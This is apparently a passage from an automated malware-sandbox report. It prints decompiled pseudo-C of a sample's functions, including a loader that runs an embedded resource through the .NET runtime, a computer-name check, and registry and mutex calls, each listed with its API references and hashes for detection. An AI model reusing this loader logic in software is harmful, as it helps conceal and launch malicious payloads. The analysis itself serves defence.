				if(_t22 <= 0) {
					goto L5;
				}
				 *0x6ff76970 =  *0x6ff76970 - 1;
				goto L3;
			}













                0x6ff7101f
                0x6ff71025
                0x6ff71035
                0x6ff71035
                0x6ff71040
                0x6ff71046
                0x6ff71089
                0x6ff710c4
                0x6ff710c6
                0x00000000
                0x6ff710c6
                0x6ff7108b
                0x6ff71092
                0x00000000
                0x00000000
                0x6ff71094
                0x6ff7109b
                0x6ff7109b
                0x6ff7109e
                0x6ff710a2
                0x6ff710a6
                0x6ff710a8
                0x6ff710aa
                0x6ff710aa
                0x6ff710af
                0x6ff710af
                0x6ff710b5
                0x6ff710bb
                0x00000000
                0x6ff710c3
                0x6ff7104d
                0x6ff71056
                0x6ff7105b
                0x6ff71061
                0x6ff71064
                0x6ff71069
                0x6ff7106e
                0x6ff71073
                0x6ff71078
                0x6ff7107d
                0x00000000
                0x6ff71084
                0x6ff7105d
                0x00000000
                0x6ff7105d
                0x6ff71027
                0x6ff7102d
                0x00000000
                0x00000000
                0x6ff7102f
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _inittermfreemalloc
                • String ID: ($kuP~u
                • API String ID: 1678931842-321059530
                • Opcode ID: 419076c3605d35d56b140bc9f3dbe209b6433b45c241c56a8f27dbdc4860750a
                • Instruction ID: 090cc875cecd465caff75d395dcdd166f0e0b80fabfc3ae21f1a185dfb6fdd29
                • Opcode Fuzzy Hash: 419076c3605d35d56b140bc9f3dbe209b6433b45c241c56a8f27dbdc4860750a
                • Instruction Fuzzy Hash: BE11F832626A61CEEB248F34F964B55F7F1BF0B7A1B10411BE515CA3A0DB22B4588F50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF72090, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E6FF72090(intOrPtr* _a4, char* _a8, int* _a12, intOrPtr _a16) {
				short* _v8;
				short* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				short* _t83;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t135;
				void* _t136;

				_v8 = 0xc0000bbb;
				0x6ff70000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t136 = _t135 + 0x14;
				if(_a4 == 0 || _a12 == 0) {
					return 0xc0000bbd;
				}
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if( *_a4 == 0) {
					L6:
					if( *((intOrPtr*)(_a4 + 4)) == 0) {
						L9:
						if( *((intOrPtr*)(_a4 + 8)) == 0) {
							L12:
							if( *((intOrPtr*)(_a4 + 0xc)) == 0) {
								L15:
								if( *((intOrPtr*)(_a4 + 0x14)) == 0) {
									L18:
									_v28 =  *((intOrPtr*)(_a4 + 0x10));
									_v16 = 0;
									_t83 = E6FF71EA0( &_v44, 0,  &_v16, _a16);
									_v8 = _t83;
									if(_v8 == 0x800007d2) {
										0x6ff70000(_v16 << 1);
										_t136 = _t136 + 4;
										_v12 = _t83;
										if(_v12 == 0) {
											_v8 = 0xc0000bbb;
										} else {
											_v8 = E6FF71EA0( &_v44, _v12,  &_v16, _a16);
											if(_v8 == 0) {
												_v20 = WideCharToMultiByte(0, 0, _v12, 0xffffffff, 0, 0, 0, 0);
												if( *_a12 < _v20) {
													_v8 = 0x800007d2;
												} else {
													WideCharToMultiByte(0, 0, _v12, 0xffffffff, _a8,  *_a12, 0, 0);
												}
												 *_a12 = _v20;
											}
											0x6ff70000(_v12);
											_t136 = _t136 + 4;
										}
									}
									L27:
									0x6ff70000(_v44);
									0x6ff70000(_v40);
									0x6ff70000(_v36);
									0x6ff70000(_v32);
									0x6ff70000(_v24);
									return _v8;
								}
								_t95 = E6FF72B80( *((intOrPtr*)(_a4 + 0x14)));
								_t136 = _t136 + 4;
								_v24 = _t95;
								if(_v24 != 0) {
									goto L18;
								}
								goto L27;
							}
							_t97 = E6FF72B80( *((intOrPtr*)(_a4 + 0xc)));
							_t136 = _t136 + 4;
							_v32 = _t97;
							if(_v32 != 0) {
								goto L15;
							}
							goto L27;
						}
						_t99 = E6FF72B80( *((intOrPtr*)(_a4 + 8)));
						_t136 = _t136 + 4;
						_v36 = _t99;
						if(_v36 != 0) {
							goto L12;
						}
						goto L27;
					}
					_t101 = E6FF72B80( *((intOrPtr*)(_a4 + 4)));
					_t136 = _t136 + 4;
					_v40 = _t101;
					if(_v40 != 0) {
						goto L9;
					}
					goto L27;
				}
				_t103 = E6FF72B80( *_a4);
				_t136 = _t136 + 4;
				_v44 = _t103;
				if(_v44 != 0) {
					goto L6;
				}
				goto L27;
			}





















                0x6ff72096
                0x6ff720b2
                0x6ff720b7
                0x6ff720be
                0x00000000
                0x6ff720c6
                0x6ff720d2
                0x6ff720d5
                0x6ff720d8
                0x6ff720db
                0x6ff720de
                0x6ff720e1
                0x6ff720ea
                0x6ff72108
                0x6ff7210f
                0x6ff7212e
                0x6ff72135
                0x6ff72154
                0x6ff7215b
                0x6ff7217a
                0x6ff72181
                0x6ff721a0
                0x6ff721a6
                0x6ff721a9
                0x6ff721be
                0x6ff721c3
                0x6ff721cd
                0x6ff721d9
                0x6ff721de
                0x6ff721e1
                0x6ff721e8
                0x6ff7226e
                0x6ff721ee
                0x6ff72203
                0x6ff7220a
                0x6ff72224
                0x6ff7222f
                0x6ff72251
                0x6ff72231
                0x6ff72249
                0x6ff72249
                0x6ff7225e
                0x6ff7225e
                0x6ff72264
                0x6ff72269
                0x6ff72269
                0x6ff721e8
                0x6ff72275
                0x6ff72279
                0x6ff72285
                0x6ff72291
                0x6ff7229d
                0x6ff722a9
                0x00000000
                0x6ff722b1
                0x6ff7218a
                0x6ff7218f
                0x6ff72192
                0x6ff72199
                0x00000000
                0x00000000
                0x00000000
                0x6ff7219b
                0x6ff72164
                0x6ff72169
                0x6ff7216c
                0x6ff72173
                0x00000000
                0x00000000
                0x00000000
                0x6ff72175
                0x6ff7213e
                0x6ff72143
                0x6ff72146
                0x6ff7214d
                0x00000000
                0x00000000
                0x00000000
                0x6ff7214f
                0x6ff72118
                0x6ff7211d
                0x6ff72120
                0x6ff72127
                0x00000000
                0x00000000
                0x00000000
                0x6ff72129
                0x6ff720f2
                0x6ff720f7
                0x6ff720fa
                0x6ff72101
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: %p %p %p 0x%08x
                • API String ID: 0-2106592379
                • Opcode ID: 7d7c41eee44660d4b2867ced837964b8a50a58a22f6ae69ccc9432da60f322f5
                • Instruction ID: b335c1c90b0a039bf91ad0ad8a4d8ef0785c6d0b9d275c30b7c38ba79fd9a819
                • Opcode Fuzzy Hash: 7d7c41eee44660d4b2867ced837964b8a50a58a22f6ae69ccc9432da60f322f5
                • Instruction Fuzzy Hash: 6F711CB5904208EFDB14CF94E840BDEB7B5BF48314F10855AE905AB380DBB6EA90CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF72560, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E6FF72560(intOrPtr _a4, intOrPtr _a8, char* _a12, int* _a16) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				char _v20;
				short _v2068;
				short* _t32;
				intOrPtr _t33;
				int _t44;
				void* _t58;
				void* _t61;

				_v8 = 0;
				_t32 =  &_v2068;
				0x6ff70000(_t32);
				_v20 = _t32;
				_t33 = _a8;
				0x6ff70000(_a4, _t33, _a12, _a16);
				0x6ff70000("%s %d %p %p\n", _t33);
				_t61 = _t58 + 0x1c;
				if(_a12 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					if(_a4 == 0) {
						L6:
						_v16 = E6FF72440(_v8, _a8,  &_v2068,  &_v20);
						if(_v16 == 0) {
							_v12 = WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, 0, 0, 0, 0);
							if( *_a16 >= _v12) {
								WideCharToMultiByte(0, 0,  &_v2068, 0xffffffff, _a12, _v12, 0, 0);
							} else {
								_v16 = 0x800007d2;
							}
							 *_a16 = _v12;
						}
						0x6ff70000(_v8);
						return _v16;
					}
					_t44 = E6FF72B80(_a4);
					_t61 = _t61 + 4;
					_v8 = _t44;
					if(_v8 != 0) {
						goto L6;
					}
					return 0xc0000bbb;
				}
			}













                0x6ff72569
                0x6ff72570
                0x6ff72577
                0x6ff7257f
                0x6ff7258a
                0x6ff72592
                0x6ff725a0
                0x6ff725a5
                0x6ff725ac
                0x00000000
                0x6ff725be
                0x6ff725c2
                0x6ff725e3
                0x6ff725fb
                0x6ff72602
                0x6ff7261f
                0x6ff7262a
                0x6ff7264e
                0x6ff7262c
                0x6ff7262c
                0x6ff7262c
                0x6ff7265a
                0x6ff7265a
                0x6ff72660
                0x00000000
                0x6ff72668
                0x6ff725c8
                0x6ff725cd
                0x6ff725d0
                0x6ff725d7
                0x00000000
                0x00000000
                0x00000000
                0x6ff725d9

                APIs
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF72619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF7264E
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide
                • String ID: %s %d %p %p
                • API String ID: 626452242-2135802371
                • Opcode ID: d48a9f21842d2f3a879f451659d7988fdef23d035ea2ec0c1f2e176acb18c3a6
                • Instruction ID: 0d78f1e47bf649cfc2712f0d761567da3e584508d6528d6078469bb9142e2a6f
                • Opcode Fuzzy Hash: d48a9f21842d2f3a879f451659d7988fdef23d035ea2ec0c1f2e176acb18c3a6
                • Instruction Fuzzy Hash: 62316DB1904208EBDB20CF94EC40F9EB7B8BF08714F10855AF914A72C4DBB5AA50CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF72CE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E6FF72CE0(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				short _v44;
				long _t13;
				intOrPtr _t17;

				_t13 =  &_v44;
				0x6ff70000(_t13);
				_v8 = _t13;
				if(GetComputerNameW( &_v44,  &_v8) != 0) {
					if(_a8 != _v8) {
						L5:
						_v12 = 0;
						L6:
						return _v12;
					}
					_t17 = _a4;
					__imp___wcsnicmp(_t17,  &_v44, _v8);
					if(_t17 != 0) {
						goto L5;
					}
					_v12 = 1;
					goto L6;
				}
				return 0;
			}








                0x6ff72ce6
                0x6ff72cea
                0x6ff72cf2
                0x6ff72d05
                0x6ff72d11
                0x6ff72d35
                0x6ff72d35
                0x6ff72d3c
                0x00000000
                0x6ff72d3c
                0x6ff72d1b
                0x6ff72d1f
                0x6ff72d2a
                0x00000000
                0x00000000
                0x6ff72d2c
                0x00000000
                0x6ff72d2c
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.300875574.000000006FF71000.00000020.00020000.sdmp, Offset: 6FF70000, based on PE: true
                • Associated: 0000000C.00000002.300864035.000000006FF70000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300897654.000000006FF74000.00000002.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300925253.000000006FF75000.00000040.00020000.sdmp Download File
                • Associated: 0000000C.00000002.300940311.000000006FF77000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ComputerName_wcsnicmp
                • String ID: P~u
                • API String ID: 657830731-3400813311
                • Opcode ID: fe6b1d68f47e3a6f78dfd73f07b666df2c2260c6338e27a639154391d41dde51
                • Instruction ID: 178c1a39a032117b05b7ca0873e733655cde4e36d96ba48f662d2a81d0f18d7b
                • Opcode Fuzzy Hash: fe6b1d68f47e3a6f78dfd73f07b666df2c2260c6338e27a639154391d41dde51
                • Instruction Fuzzy Hash: 51F0F476908208EBCB10DFE4E984ACDFBB8AF08314F504559E905D7205FB71E6558F71
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: dhcpmon.exe PID: 6216 Parent PID: 2724 dhcpmon.exeCOMMON

                Executed Functions

                Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                0x00401e22
                0x00401e28

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02573850, Relevance: .8, Instructions: 755COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6cf91cdb1addcfca3dff4faa95d3af84005f26ec26fa7e8c439c71bdd7e8818
                • Instruction ID: 894bce31e505f9587f1f037debd2d8eef25d2412e5640ede9e94f73c0041b06c
                • Opcode Fuzzy Hash: d6cf91cdb1addcfca3dff4faa95d3af84005f26ec26fa7e8c439c71bdd7e8818
                • Instruction Fuzzy Hash: 20521671A04215DFCB14CF68D8849AEBFB2FF85320B1985EAD8099F252D731EC42DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 025723A0, Relevance: .5, Instructions: 505COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a75cab9658fc69fdf77935c6a408ef9a2963e48fed069785826cb6c0ed187a3
                • Instruction ID: 25f6de6087e9a705255fbf2cd19214843e12216f35e125838ad827b8611d8a1c
                • Opcode Fuzzy Hash: 8a75cab9658fc69fdf77935c6a408ef9a2963e48fed069785826cb6c0ed187a3
                • Instruction Fuzzy Hash: 6C12DC70A00215CFDB24CF79E9946AEBBF2FF88314F24856AD806DB255DBB48846CB44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02572FA8, Relevance: .2, Instructions: 239COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.314167427.0000000002570000.00000040.00000001.sdmp, Offset: 02570000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8952ad9997801c9587e3c49708bcaa4b2955ada6e5f8a1a32d8282aa2eb75de9
                • Instruction ID: a5c22d65fb8298f2861eb4429b29c3814e9d768192b06a2d38cc08f5104687d1
                • Opcode Fuzzy Hash: 8952ad9997801c9587e3c49708bcaa4b2955ada6e5f8a1a32d8282aa2eb75de9
                • Instruction Fuzzy Hash: 13816C71F01116ABD714DB69E984A6EB7E3AFC8320F2A84B5D405EB369DE31DC018B94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                0x0040149f
                0x004014a5
                0x004014a9
                0x004014ec
                0x004014ee
                0x004014ee
                0x004014b7
                0x004014bb
                0x004014c7
                0x004014cd
                0x004014d3
                0x004014d8
                0x004014e0
                0x004014e0
                0x004014d8
                0x004014e6
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v2.0.50727
                • API String ID: 2372384083-2350909873
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                0x004055c5
                0x004055cf
                0x004055d3
                0x004055e4
                0x004055e8
                0x004055ed
                0x004055f3
                0x004055f8
                0x004055fd
                0x00405602
                0x00405609
                0x004055d5
                0x004055d5
                0x004055d5
                0x00405614

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 0000000E.00000001.298007020.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A5B080, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • SetConsoleCtrlHandler.KERNELBASE(?,00000E80,?,?), ref: 00A5B11A
                Memory Dump Source
                • Source File: 0000000E.00000002.313746388.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false
                Similarity
                • API ID: ConsoleCtrlHandler
                • String ID:
                • API String ID: 1513847179-0
                • Opcode ID: 61fede05f8a961f43bc0bbd7b799791a2cf6af45a41aa3c5c87f01987b85bb97
                • Instruction ID: 7589780695df6543e73682b75e3bd66aedc5ec9039bce23f05d674082e60e14f
                • Opcode Fuzzy Hash: 61fede05f8a961f43bc0bbd7b799791a2cf6af45a41aa3c5c87f01987b85bb97
                • Instruction Fuzzy Hash: 6C41D1755493809FD7128F25DC51B62BFB4EF42620F0981DBEC848F693D235A919CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A5AA7E, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A5AB2D
                Memory Dump Source
                • Source File: 0000000E.00000002.313746388.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: 3fb5d08f424791cd334a95462fdb6cb01a76790defb8880f268430778b441d40
                • Instruction ID: d374b9fe448d12370731db728ddb2b9f2855d25c9d8d12ebeea2d4344b6bbbf0
                • Opcode Fuzzy Hash: 3fb5d08f424791cd334a95462fdb6cb01a76790defb8880f268430778b441d40
                • Instruction Fuzzy Hash: A231D1725443846FE7228B25CC45FA7BFACEF06710F0885AEED858B152D225E909CBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A5AB75, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                Download Yara Rule
                APIs
                • RegQueryValueExW.KERNELBASE(?,00000E80,7D12A218,00000000,00000000,00000000,00000000), ref: 00A5AC30
                Memory Dump Source
                • Source File: 0000000E.00000002.313746388.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false
                Similarity
                • API ID: QueryValue
                • String ID:
                • API String ID: 3660427363-0
                • Opcode ID: ddd7398625b774898b27d726d82ac1244bf98b2482e3154bf53ee6892be634f5
                • Instruction ID: 847b9ae6cc04d998901785560e3c8fa5899f6884f8b62c4760bfe510a972683a
                • Opcode Fuzzy Hash: ddd7398625b774898b27d726d82ac1244bf98b2482e3154bf53ee6892be634f5
                • Instruction Fuzzy Hash: C43191716097806FE722CF65CC84FA2BFE8EF06710F08859AE985CB153D364E949CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C50416, Relevance: 1.6, APIs: 1, Instructions: 84synchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateMutexW.KERNELBASE(?,?), ref: 04C504B1
                Memory Dump Source
                • Source File: 0000000E.00000002.314701454.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                Similarity
                • API ID: CreateMutex
                • String ID:
                • API String ID: 1964310414-0
                • Opcode ID: 44041523c593fafb627a0b4c92d4e38ec9abe5fbb01a301dd23f9767e3433f00
                • Instruction ID: 05dbf1c6e41c62cc478d5c54a141c24a02c12ed6dde27d10573a84a56e6ee466
                • Opcode Fuzzy Hash: 44041523c593fafb627a0b4c92d4e38ec9abe5fbb01a301dd23f9767e3433f00
                • Instruction Fuzzy Hash: 863180715093806FE721CF65CC85B66FFE8EF05310F0884AEE984CB292D365E948CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A5B51B, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.313746388.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false
                Similarity
                • API ID: ClassInfo
                • String ID:
                • API String ID: 3534257612-0
                • Opcode ID: 5c583a9d5633492118211f87b751a55f7bd0a7639fb0b9cb641bd568cf207bbd
                • Instruction ID: 8ada31ad0ce27716e12a552b27167bb5b29842631a332b37601d733e752fd2c1
                • Opcode Fuzzy Hash: 5c583a9d5633492118211f87b751a55f7bd0a7639fb0b9cb641bd568cf207bbd
                • Instruction Fuzzy Hash: 7331277650E7C05FE7138B259C50A52BFB4AF07211B0A80DBD985CF1A3E229A91DD772
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A5AAAE, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A5AB2D
                Memory Dump Source
                • Source File: 0000000E.00000002.313746388.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false
                Similarity
                • API ID: Open
                • String ID:
                • API String ID: 71445658-0
                • Opcode ID: f0adb8568b33967aba106a951f305241b9f09bbcca8a82c34a1c49ca84aac98d
                • Instruction ID: f2ee68e35474ce2bdf7450f3aa138841ca2be2a8868bdd4ebfd6e1a94d689076
                • Opcode Fuzzy Hash: f0adb8568b33967aba106a951f305241b9f09bbcca8a82c34a1c49ca84aac98d
                • Instruction Fuzzy Hash: 3321D172600304AFEB209F55DC84F6AFBECEF08721F04851AED459B241D231E908CBB2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04C5043E, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateMutexW.KERNELBASE(?,?), ref: 04C504B1
                Memory Dump Source
                • Source File: 0000000E.00000002.314701454.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                Similarity
                • API ID: CreateMutex
                • String ID:
                • API String ID: 1964310414-0
                • Opcode ID: d74235c37da92efcc8974d77e5a4cd394664c70c74dba0e0c0a013d3cce521a1
                • Instruction ID: 96e5921b6cbe48cfc1a472a663f6567e208d1163228f6c26ec9585227b57457e
                • Opcode Fuzzy Hash: d74235c37da92efcc8974d77e5a4cd394664c70c74dba0e0c0a013d3cce521a1
                • Instruction Fuzzy Hash: B4218071600240AFE720DF26DD85B6AFBE8EF04320F18846AED85DB252D375F544CA75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A5ABB6, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                Download Yara Rule
                APIs
                • RegQueryValueExW.KERNELBASE(?,00000E80,7D12A218,00000000,00000000,00000000,00000000), ref: 00A5AC30
                Memory Dump Source
                • Source File: 0000000E.00000002.313746388.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false
                Similarity
                • API ID: QueryValue
                • String ID:
                • API String ID: 3660427363-0
                • Opcode ID: 8d892546a9098c3c86d1c16515a79f29e08a2087026d0871bde6d8648ddac25f
                • Instruction ID: 5989129ab6cf79b6147cf628771a7bfcfa6d3b0fa2953674b1f1a4c686fbc367
                • Opcode Fuzzy Hash: 8d892546a9098c3c86d1c16515a79f29e08a2087026d0871bde6d8648ddac25f
                • Instruction Fuzzy Hash: 832181716006049FE720CF56DC80F66BBE8FF14711F04856AED49CB251D770E848CA72
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00A5BB8A, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 00A5BC01
                Memory Dump Source
                • Source File: 0000000E.00000002.313746388.0000000000A5A000.00000040.00000001.sdmp, Offset: 00A5A000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 3d500fa81d950f8e1118c30a05fbbacd9dc97b0fe8ecdadde34c33bd9383f8bf
                • Instruction ID: 9b4e4747d675baa8141c6208b23c64ebab8ecc387238513d772ac849c00ff360
